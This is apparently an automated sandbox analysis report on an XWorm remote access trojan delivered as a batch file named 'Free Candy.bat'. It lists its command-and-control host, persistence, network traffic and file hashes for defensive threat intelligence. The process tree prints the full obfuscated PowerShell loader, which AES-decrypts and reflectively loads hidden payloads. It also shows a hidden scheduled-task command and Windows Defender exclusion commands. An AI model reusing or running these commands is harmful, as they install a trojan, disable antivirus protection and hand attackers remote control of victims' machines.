xworm | e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
06/08/2024, 04:05 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Free Candy.bat
Size

726KB
MD5

5f14117f1fd87fa46fb37b56e87f0e7f
SHA1

50a2950aaad34258933cf10f78195b61f870ee7d
SHA256

e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae
SHA512

1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0
SSDEEP

12288:jRqwpZL+rpkFQN7X/oWnNVnh9E8pW9IGsHmcTAl79RCMzTindB:jRL6lpvoWL/EF9IYcTiSWcB

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

hard-tyler.gl.at.ply.gg:27490

Attributes

Install_directory
%Temp%
install_file
systemprocess.exe

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral3/memory/3616-14-0x00000268CBAA0000-0x00000268CBB46000-memory.dmp	family_xworm
behavioral3/memory/648-50-0x0000029F49990000-0x0000029F499E0000-memory.dmp	family_xworm
behavioral3/files/0x000200000002a9f2-53.dat	family_xworm
behavioral3/memory/2968-61-0x00000000001B0000-0x00000000001FE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	648	powershell.exe
17	648	powershell.exe
18	648	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3616	powershell.exe
3716	powershell.exe
648	powershell.exe
4440	powershell.exe
1108	powershell.exe
4824	powershell.exe
3320	powershell.exe
1896	powershell.exe
1560	powershell.exe
2892	powershell.exe
1572	powershell.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk	XClient.exe

Executes dropped EXE 1 IoCs

pid	Process
2968	XClient.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"	XClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3616	powershell.exe
3616	powershell.exe
3716	powershell.exe
3716	powershell.exe
648	powershell.exe
648	powershell.exe
1108	powershell.exe
1108	powershell.exe
4824	powershell.exe
4824	powershell.exe
3320	powershell.exe
3320	powershell.exe
1896	powershell.exe
1896	powershell.exe
1560	powershell.exe
1560	powershell.exe
2892	powershell.exe
2892	powershell.exe
1572	powershell.exe
1572	powershell.exe
2968	XClient.exe
4440	powershell.exe
4440	powershell.exe
648	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3616	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe
Token: 36	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe
Token: 36	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2968	XClient.exe
648	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 4916 wrote to memory of 3616	4916	cmd.exe	83
PID 4916 wrote to memory of 3616	4916	cmd.exe	83
PID 3616 wrote to memory of 3716	3616	powershell.exe	84
PID 3616 wrote to memory of 3716	3616	powershell.exe	84
PID 3616 wrote to memory of 1996	3616	powershell.exe	87
PID 3616 wrote to memory of 1996	3616	powershell.exe	87
PID 1996 wrote to memory of 2332	1996	WScript.exe	88
PID 1996 wrote to memory of 2332	1996	WScript.exe	88
PID 2332 wrote to memory of 648	2332	cmd.exe	92
PID 2332 wrote to memory of 648	2332	cmd.exe	92
PID 648 wrote to memory of 2968	648	powershell.exe	93
PID 648 wrote to memory of 2968	648	powershell.exe	93
PID 2968 wrote to memory of 1108	2968	XClient.exe	97
PID 2968 wrote to memory of 1108	2968	XClient.exe	97
PID 2968 wrote to memory of 4824	2968	XClient.exe	99
PID 2968 wrote to memory of 4824	2968	XClient.exe	99
PID 2968 wrote to memory of 3320	2968	XClient.exe	101
PID 2968 wrote to memory of 3320	2968	XClient.exe	101
PID 2968 wrote to memory of 1896	2968	XClient.exe	103
PID 2968 wrote to memory of 1896	2968	XClient.exe	103
PID 648 wrote to memory of 1560	648	powershell.exe	105
PID 648 wrote to memory of 1560	648	powershell.exe	105
PID 648 wrote to memory of 2892	648	powershell.exe	107
PID 648 wrote to memory of 2892	648	powershell.exe	107
PID 648 wrote to memory of 1572	648	powershell.exe	109
PID 648 wrote to memory of 1572	648	powershell.exe	109
PID 648 wrote to memory of 4440	648	powershell.exe	111
PID 648 wrote to memory of 4440	648	powershell.exe	111

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Free Candy.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Free Candy.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Free Candy.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_996_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_996.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3716
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_996.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_996.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_996.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_996.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:648
      - C:\Users\Admin\AppData\Local\Temp\XClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1896
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1560
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2892
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1572
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4440

Network

DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR

Response
DNS

17.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.160.190.20.in-addr.arpa

IN PTR
DNS

81.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.144.22.2.in-addr.arpa

IN PTR

Response

81.144.22.2.in-addr.arpa

IN PTR

a2-22-144-81deploystaticakamaitechnologiescom
DNS

81.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.144.22.2.in-addr.arpa

IN PTR
GET

http://ip-api.com/line/?fields=hosting

powershell.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 06 Aug 2024 04:05:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 59
X-Rl: 43
GET

http://ip-api.com/line/?fields=hosting

XClient.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 06 Aug 2024 04:05:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44

150.171.27.10:443

tse1.mm.bing.net

tls

105.3kB
3.0MB
2202
2195
150.171.27.10:443

tse1.mm.bing.net

tls

1.6kB
7.2kB
17
15
150.171.27.10:443

tse1.mm.bing.net

tls

1.6kB
7.2kB
17
15
150.171.27.10:443

tse1.mm.bing.net

tls

1.7kB
7.1kB
17
12
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

powershell.exe

460 B
602 B
8
6

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

XClient.exe

356 B
347 B
6
4

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
147.185.221.19:27490

hard-tyler.gl.at.ply.gg

XClient.exe

2.6kB
1.3kB
30
26
147.185.221.19:27490

hard-tyler.gl.at.ply.gg

powershell.exe

3.2kB
15.9kB
38
42
147.185.221.19:27490

hard-tyler.gl.at.ply.gg

powershell.exe

2.4MB
39.3kB
1842
677

8.8.8.8:53

17.160.190.20.in-addr.arpa

dns

144 B
158 B
2
1

DNS Request

17.160.190.20.in-addr.arpa

DNS Request

17.160.190.20.in-addr.arpa
8.8.8.8:53

81.144.22.2.in-addr.arpa

dns

140 B
133 B
2
1

DNS Request

81.144.22.2.in-addr.arpa

DNS Request

81.144.22.2.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fbb4e8415e008bf79e755425a54433af

SHA1
c4fa0a240750ab85a308440216280dfc43d2d36b

SHA256
94bc3aa67778cbd2995353f1b667a0b339225ceab6467a9dec2a7b1c85da5cf1

SHA512
1cdb4433a7f2f85e913bd653771275503c173f1ca1af10588d3e95615c20fbe773c4c085e34aad4c380addff2309081326cc855286355e0c1f89e8021787e257

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
050567a067ffea4eb40fe2eefebdc1ee

SHA1
6e1fb2c7a7976e0724c532449e97722787a00fec

SHA256
3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

SHA512
341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e0391d00f5bfbc34be70790f14d5edf

SHA1
fcb04d8599c23967de4f154a101be480933ab0d0

SHA256
1c0c0c86d7c736fc9fb148ac7cd6e67565dc5b76fa116ae3b000a79e91855136

SHA512
231b9cc6efb928f0748cef04f287d9204c4f7d2eb4bc27f345e9a1afc6d0675057978ca44d1a95334ee2380709aa6dbe74015fedff8f17611a64efcfb9f64d2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb15ee5741b379245ca8549cb0d4ecf8

SHA1
3555273945abda3402674aea7a4bff65eb71a783

SHA256
b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

SHA512
1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef79c323e1b63e0734a04e4f252e7b47

SHA1
641290ca1f8645aef67e518a4b57d72a940e61f4

SHA256
5c361e04d734506c0fab334e63a69bf5562e9b77c10687d056bbf2bc05d60ccd

SHA512
23e5e0c11e29aa5e413f11cbc2523304bfaede03aff9f4f39b2dc99d65aefc8a242c3573df68c49cee69ec0f77da90aea0155cca4e3e2ff7f371cf23da424b1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b0a85f07903eaad4aace8865ff28679f

SHA1
caa147464cf2e31bf9b482c3ba3c5c71951566d1

SHA256
c85c7915e0bcc6cc3d7dd2f6b9d9e4f9a3cf0ccefa043b1c500facac8428bfd5

SHA512
7a650a74a049e71b748f60614723de2b9d2385a0f404606bcb22ae807e22a74c53cf672df9e7a23605dfff37865443a5899eafea323134a818eb59c96e0f94bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
64497dba662bee5d7ae7a3c76a72ed88

SHA1
edc027042b9983f13d074ba9eed8b78e55e4152e

SHA256
ca69ebbd2c9c185f0647fb2122d7a26e7d23af06a1950fb25ac327d869687b47

SHA512
25da69ec86ba0df6c7da60f722cc2919c59c91f2bb03137e0e87771936e5271522d48eef98030a0da41f7a707d82221d35fb016f8bb9a294e87be114adbe3522

Download Submit
C:\Users\Admin\AppData\Local\Temp\XClient.exe

Filesize
292KB

MD5
06aa0446d6ce7b7d44270ef4218793cf

SHA1
2ae7b6b80a4025c262aa6f38db7bd1ece676648d

SHA256
db7b93708805fbcf98f5fd0068b24becf4e1f11371ed2f6f58e3bafb9c272068

SHA512
49220519f8f773bd0c74e2eb8cec902071026741ecd88453d2c4dc5ee78175f67320c9cba0d81e9858f1180573df0068ab570a967af5d7076e803ad71d9a6971

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g54bzqlh.xi0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk

Filesize
1KB

MD5
cb7a7f3603109ba308fd6285dbe9a106

SHA1
f81714a7618a3742dc74dcfd2e756ca420fed270

SHA256
3951490ac8d1cd55688e85d455cb6565f892bc3d5eb97872a43eea59734b20af

SHA512
8294702a657982edb25711671b28974d3592f377bec4cb98f79fa557010bc7b4e7ebd2a29fd90fc90d3de0ce0c2327a753a160f9f9681e19a2b43add3ff18164

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_996.bat

Filesize
726KB

MD5
5f14117f1fd87fa46fb37b56e87f0e7f

SHA1
50a2950aaad34258933cf10f78195b61f870ee7d

SHA256
e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

SHA512
1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_996.vbs

Filesize
115B

MD5
f52aefffb8c10a5648a3f682c4bbdca8

SHA1
77def78e943b5acabc49859bb6d75c2b4a58bdea

SHA256
4d3f05c5dc1cd2b59b957e492ad0fc5b58b00c2b935d645ec377c8f21cc3390c

SHA512
6bf0614b8859375d65a344bb586967e4afaa7cadb002913deeeaf5721d574bff327689ec8123afabeec2a8923a31936fe959b036b124fa75c67a3bcac74c3ba3

Download Submit
memory/648-50-0x0000029F49990000-0x0000029F499E0000-memory.dmp

Filesize
320KB

Download
memory/648-151-0x0000029F4A130000-0x0000029F4A13C000-memory.dmp

Filesize
48KB

Download
memory/2968-61-0x00000000001B0000-0x00000000001FE000-memory.dmp

Filesize
312KB

Download
memory/3616-149-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
memory/3616-13-0x00000268CB800000-0x00000268CB808000-memory.dmp

Filesize
32KB

Download
memory/3616-14-0x00000268CBAA0000-0x00000268CBB46000-memory.dmp

Filesize
664KB

Download
memory/3616-150-0x00007FFD6B683000-0x00007FFD6B685000-memory.dmp

Filesize
8KB

Download
memory/3616-11-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
memory/3616-0-0x00007FFD6B683000-0x00007FFD6B685000-memory.dmp

Filesize
8KB

Download
memory/3616-12-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
memory/3616-10-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
memory/3616-9-0x00000268CB810000-0x00000268CB832000-memory.dmp

Filesize
136KB

Download
memory/3716-26-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
memory/3716-21-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
memory/3716-25-0x00007FFD6B680000-0x00007FFD6C142000-memory.dmp

Filesize
10.8MB

Download
